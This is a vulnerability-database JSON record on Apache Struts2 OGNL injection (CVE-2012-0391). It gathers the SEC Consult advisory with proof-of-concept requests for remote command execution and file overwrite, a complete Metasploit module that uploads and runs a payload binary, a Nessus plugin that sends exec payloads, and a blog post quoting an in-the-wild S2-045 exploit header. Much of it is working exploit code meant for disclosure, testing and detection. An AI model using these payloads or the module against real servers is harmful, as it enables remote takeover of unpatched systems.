"2012-01-06T00:00:00", "id": "EDB-ID:18329", "href": "https://www.exploit-db.com/exploits/18329/", "type": "exploitdb", "title": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities", "sourceData": "SEC Consult Vulnerability Lab Security Advisory < 20120104-0 >\r\n=======================================================================\r\n title: Multiple critical vulnerabilities in Apache Struts2\r\n product: Apache Struts2\r\n * OpenSymphony XWork\r\n * OpenSymphony OGNL\r\n vulnerable version: 2.3.1 and below\r\n fixed version: 2.3.1.1\r\n impact: critical\r\n homepage: http://struts.apache.org/\r\n found: 2011-11-18\r\n by: Johannes Dahse, Andreas Nusser\r\n SEC Consult Vulnerability Lab \r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\nApache Struts2 is a web framework for creating Java web applications. It is\r\nusing the OpenSymphony XWork and OGNL libraries. By default, XWork's\r\nParametersInterceptor treats parameter names provided to actions as OGNL\r\nexpressions. A OGNL (Object Graph Navigation Language) expression is a limited\r\nlanguage similar to Java that is tokenized and parsed by the OGNL parser which\r\ninvokes appropiate Java methods. This allows e.g. convenient access to\r\nproperties that have a getter/setter method implemented. By providing a\r\nparameter like \"product.id=1\" the OGNL parser will call the appropiate setter\r\ngetProduct().setId(1) in the current action context. OGNL is also able to call\r\narbitrary methods, constructors and access context variables. For more details\r\nplease refer to http://commons.apache.org/ognl/language-guide.html.\r\n\r\n \r\nVulnerability overview/description:\r\n-----------------------------------\r\nTo prevent attackers calling arbitrary methods within parameters the flag\r\n\"xwork.MethodAccessor.denyMethodExecution\" is set to \"true\" and the\r\nSecurityMemberAccess field \"allowStaticMethodAccess\" is set to \"false\" by\r\ndefault. Also, to prevent access to context variables an improved character\r\nwhitelist for paramteter names is applied in XWork's ParametersInterceptor since\r\nStruts 2.2.1.1:\r\n\r\nacceptedParamNames = \"[a-zA-Z0-9\\\\.\\\\]\\\\[\\\\(\\\\)_'\\\\s]+\";\r\n\r\nUnder certain circumstances these restrictions can be bypassed to execute\r\nmalicious Java code.\r\n\r\n1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)\r\n\r\nWhen an exception occurs while applying parameter values to properties the\r\nvalue is evaluated as OGNL expression. For example this occurs when setting a\r\nstring value to a property with type integer. Since the values are not\r\nfiltered an attacker can abuse the power of the OGNL language to execute\r\narbitrary Java code leading to remote command execution. This issue has been\r\nreported (https://issues.apache.org/jira/browse/WW-3668) and was fixed in\r\nStruts 2.2.3.1. However the ability to execute arbitrary Java code has been\r\noverlooked.\r\n\r\n2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)\r\n\r\nThe character whitelist for parameter names is not applied to Struts\r\nCookieInterceptor. When Struts is configured to handle cookie names, an\r\nattacker can execute arbitrary system commands with static method access to\r\nJava functions. Therefore the flag \"allowStaticMethodAccess\" can be set to\r\ntrue within the request.\r\n\r\n3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)\r\n\r\nAccessing the flag \"allowStaticMethodAccess\" within parameters is prohibited\r\nsince Struts 2.2.3.1. An attacker can still access public constructors with\r\nonly one parameter of type String to create new Java objects and access their\r\nsetters with only one parameter of type String. This can be abused for example\r\nto create and overwrite arbitrary files. To inject forbidden characters to the\r\nfilename an uninitialized string property can be used.\r\n\r\n4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)\r\n\r\nWhile not being a security vulnerability itself, please note that applications\r\nrunning in developer mode and using Struts DebuggingInterceptor are prone to\r\nremote command execution as well. While applications should never run in\r\ndeveloper mode during production, developers should be aware that doing so not\r\nonly has performance issues (as documented) but also a critical security\r\nimpact.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n\r\n1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)\r\n\r\nGiven Test.java has an property \"id\" of type Integer or Long and appropriate\r\ngetter and setter methods:\r\n\tlong id;\r\n\t\r\nGiven test.jsp with result name=input is configured for action \"Test\":\r\nstruts.xml:\r\n\t<action name=\"Test\" class=\"example.Test\">\r\n\t\t<result name=\"input\">test.jsp</result>\r\n\t</action>\t\r\n\r\nThe following request will trigger an exception, the value will be evaluated\r\nas OGNL expression and arbitrary Java code can be executed:\r\n\r\n\t/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter(\"C:/wwwroot/sec-consult.jsp\")).append(\"jsp+shell\").close())%2b'\r\n\t\r\nAn attacker can\talso overwrite flags that will allow direct OS command execution:\r\n\t/Test.action?id='%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'\r\n\r\nIf test.jsp displays the property \"id\" the result of the Java code evaluation\r\ncan be accessed:\r\n\t<%@ taglib prefix=\"s\" uri=\"/struts-tags\" %>\r\n\t<s:property value=\"id\" />\t\t\r\n\t\r\n2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)\r\n\r\nGiven struts.xml is configured to handle all cookie names (independent of\r\nlimited cookie values):\r\n\t<action name=\"Test\" class=\"example.Test\">\r\n\t\t<interceptor-ref name=\"cookie\">\r\n\t\t\t<param name=\"cookiesName\">*</param>\r\n\t\t\t<param name=\"cookiesValue\">1,2</param>\r\n\t\t</interceptor-ref>\r\n\t\t<result ...>\r\n\t</action>\r\n\r\nThe following HTTP header will execute an OS command when sent to Test.action:\r\n\tCookie: (#_memberAccess[\"allowStaticMethodAccess\"]\\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1\r\n\r\n3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)\r\n\r\nGiven Test.java has an uninitialized property \"name\" of type String:\r\n\tString name; // +getter+setter\r\n\r\nThe following request will create/overwrite the file \"C:/sec-consult.txt\"\r\n(empty file):\r\n\t/Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1\r\n\t\r\nThe existence of the property 'x' used in these examples is of no importance.\r\n\r\n4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)\r\n\r\nGiven struts.xml is configured to run in developer mode and to use the\r\ndebugging interceptor:\r\n\t<constant name=\"struts.devMode\" value=\"true\" />\r\n\t<action name=\"Test\" class=\"example.Test\">\r\n\t\t<interceptor-ref name=\"debugging\" />\r\n\t\t<result ...>\r\n\t</action>\r\n\t\r\nThe following request will execute arbitrary OGNL expressions leading to remote command execution:\r\n\t/Test.action?debug=command&expression=%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc')\r\n\t\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nAll products using Struts2 are affected by at least one critical vulnerability\r\nlisted above!\r\n\r\nProof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and Struts\r\n2.2.1.1\r\n\r\nProof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 26 July 2010\r\nand Struts 2.2.1.1, 2.2.3.1 and 2.3.1\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2011-12-14: Contacting vendor through security at struts dot apache dot org\r\n2011-12-14: Vendor reply, sending advisory draft\r\n2011-12-14: Vendor released Apache Struts 2.3.1 in parallel\r\n2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted\r\n2011-12-16: Vendor reply, discussing workaround\r\n2011-12-20: Discussing release of fixed version\r\n2011-12-21: Providing additional information\r\n2012-01-03: Vendor informs that update is ready\r\n2012-01-03: Patch (2.3.1.1) is available\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to Struts 2.3.1.1\r\n\r\n\r\nWorkaround:\r\n-----------\r\nUpdate to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the\r\nParameters- and CookieInterceptor:\r\n\r\nacceptedParamNames = \"[a-zA-Z0-9\\\\.\\\\]\\\\[_']+\";\r\n\r\nDon't run your applications in developer mode.\r\n\r\n\r\nAdvisory URL:\r\n-------------\r\nhttps://www.sec-consult.com/en/advisories.html\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Unternehmensberatung GmbH\r\n\r\nOffice Vienna\r\nMooslackengasse 17\r\nA-1190 Vienna\r\nAustria\r\n\r\nTel.: +43 / 1 / 890 30 43 - 0\r\nFax.: +43 / 1 / 890 30 43 - 25\r\nMail: research at sec-consult dot com\r\nhttps://www.sec-consult.com\r\n\r\nEOF J. Dahse, A. Nusser / 2012\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18329/"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:59", "bulletinFamily": "exploit", "description": "", "modified": "2012-06-05T00:00:00", "published": "2012-06-05T00:00:00", "href": "https://packetstormsecurity.com/files/113272/Apache-Struts-2.2.1.1-Remote-Command-Execution.html", "id": "PACKETSTORM:113272", "type": "packetstorm", "title": "Apache Struts 2.2.1.1 Remote Command Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::CmdStagerTFTP \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts <= 2.2.1.1 Remote Command Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in \nApache Struts versions < 2.2.1.1. This issue is caused because the \nExceptionDelegator interprets parameter values as OGNL expressions \nduring certain exception handling for mismatched data types of properties, \nwhich allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. \n}, \n'Author' => \n[ \n'Johannes Dahse', # Vulnerability discovery and PoC \n'Andreas Nusser', # Vulnerability discovery and PoC \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'CVE', '2012-0391'], \n[ 'OSVDB', '78277'], \n[ 'EDB', '18329'], \n[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] \n], \n'Platform' => [ 'win', 'linux'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n], \n'DisclosureDate' => 'Jan 06 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', \"\"]), \nOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \n \nuri = String.new(datastore['TARGETURI']) \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\"))%2b'\") if target['Platform'] == 'win' \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\".split(\\\"@\\\")))%2b'\") if target['Platform'] == 'linux' \nuri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) \n \nvprint_status(\"Attempting to execute: #{cmd}\") \n \nresp = send_request_raw({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}, 5) \n \nend \n \ndef windows_stager \nexe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\" \n \nprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nexecute_cmdstager({ :temp => '.'}) \n@payload_exe = payload_exe \n \nprint_status(\"Attempting to execute the payload...\") \nexecute_command(@payload_exe) \nend \n \ndef linux_stager \ncmds = \"/bin/sh@-c@echo LINE | tee FILE\" \nexe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) \nbase64 = Rex::Text.encode_base64(exe) \nbase64.gsub!(/\\=/, \"\\\\u003d\") \nfile = rand_text_alphanumeric(4+rand(4)) \n \nexecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\") \ncmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\") \nbase64.each_line do |line| \nline.chomp! \ncmd = cmds \ncmd.gsub!(/LINE/, line) \nexecute_command(cmds) \nend \n \nexecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\") \n \nexecute_command(\"/bin/sh@-c@/tmp/#{file}\") \n@payload_exe = \"/tmp/\" + file \nend \n \ndef on_new_session(client) \nif target['Platform'] == 'linux' \nprint_status(\"Deleting #{@payload_exe} payload file\") \nexecute_command(\"/bin/sh@-c@rm #{@payload_exe}\") \nelse \nprint_status(\"Windows does not allow running executables to be deleted\") \nprint_status(\"Delete the #{@payload_exe} file manually after migrating\") \nend \nend \n \ndef exploit \nif not datastore['CMD'].empty? \nprint_status(\"Executing user supplied command\") \nexecute_command(datastore['CMD']) \nreturn \nend \n \ncase target['Platform'] \nwhen 'linux' \nlinux_stager \nwhen 'win' \nwindows_stager \nelse \nraise RuntimeError, 'Unsupported target platform!' \nend \n \nhandler \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113272/struts_code_exec_exception_delegator.rb.txt"}], "nessus": [{"lastseen": "2019-02-21T01:19:51", "bulletinFamily": "scanner", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to an error in the way that the ExceptionDelegator component handles mismatched data types, an unauthenticated, remote attacker can execute arbitrary commands on the remote host by sending a specially crafted request order. This flaw is due to the ExceptionDelegator interpreting parameter values as OGNL expressions when there is a conversion error. \n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "modified": "2019-02-07T00:00:00", "id": "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69240", "published": "2013-08-07T00:00:00", "title": "Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69240);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/02/07 12:14:48\");\n\n script_cve_id(\"CVE-2012-0391\");\n\n script_name(english:\"Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution\");\n script_summary(english:\"Attempts to execute arbitrary commands.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to an error in the way that the ExceptionDelegator\ncomponent handles mismatched data types, an unauthenticated, remote\nattacker can execute arbitrary commands on the remote host by sending\na specially crafted request order. This flaw is due to the\nExceptionDelegator interpreting parameter values as OGNL expressions\nwhen there is a conversion error. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\"\n );\n # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?828dc6d2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-008.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 2.2.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0391\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"torture_cgi_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\nforeach url (urls)\n{\n # Grab CGI arguments for each .action file from KB\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n\n foreach cmd (cmds)\n {\n attack = \"\";\n exploit = \"'+(#_memberAccess[\" + '\"allowStaticMethodAccess\"]=true,' +\n \"@java.lang.Runtime@getRuntime().exec('\" + cmd + \"'))+'\";\n\n # Build a string with all CGI arguments set to the exploit string\n foreach arg (cgi_args)\n {\n attack += arg + \"=\" + exploit + \"&\";\n }\n attack = ereg_replace(string:attack, pattern:\"&$\", replace:\"\");\n attack_url = url + \"?\" + attack;\n\n # Try testing with GET first\n # attack_url should look like this example :\n # /dir/blah.action?param='+(#memberAccess[\"allowStaticMethodAccess\"]=true,\n # @java.lang.Runtime@getRuntime().exec('id'))+'\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (res[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n output = res[2];\n break;\n }\n\n # Else try testing with POST\n attack_post = urlencode(\n str : attack,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=&_.\"\n );\n\n res2 = http_send_recv3(\n method : \"POST\",\n item : url,\n data : attack_post,\n port : port,\n add_headers : make_array(\"Content-Type\",\n \"application/x-www-form-urlencoded\"),\n exit_on_fail : TRUE\n );\n\n if (res2[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = http_last_sent_request();\n output = res2[2];\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : chomp(output)\n);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "d2": [{"lastseen": "2016-09-25T14:10:35", "bulletinFamily": "exploit", "description": "**Name**| d2sec_struts2 \n---|--- \n**CVE**| CVE-2012-0391 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts2 \n**Notes**| \n", "modified": "2012-01-08T10:55:01", "published": "2012-01-08T10:55:01", "id": "D2SEC_STRUTS2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts2", "title": "DSquare Exploit Pack: D2SEC_STRUTS2", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "wallarmlab": [{"lastseen": "2017-05-01T13:42:41", "bulletinFamily": "blog", "description": "Two days ago Apache has published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\nStruts2 RCE attacks in the wild\n\nThis vulnerability allows attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It\u2019s essentially similar to the previous OGNL exploits however it\u2019s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:\n \n \n %{(#_=\u2019multipart/form-data\u2019)\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nIt means that the OGNL technology are broken altogether.\n\n\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "modified": "2017-03-10T16:52:09", "published": "2017-03-09T00:15:54", "href": "https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "type": "wallarmlab", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
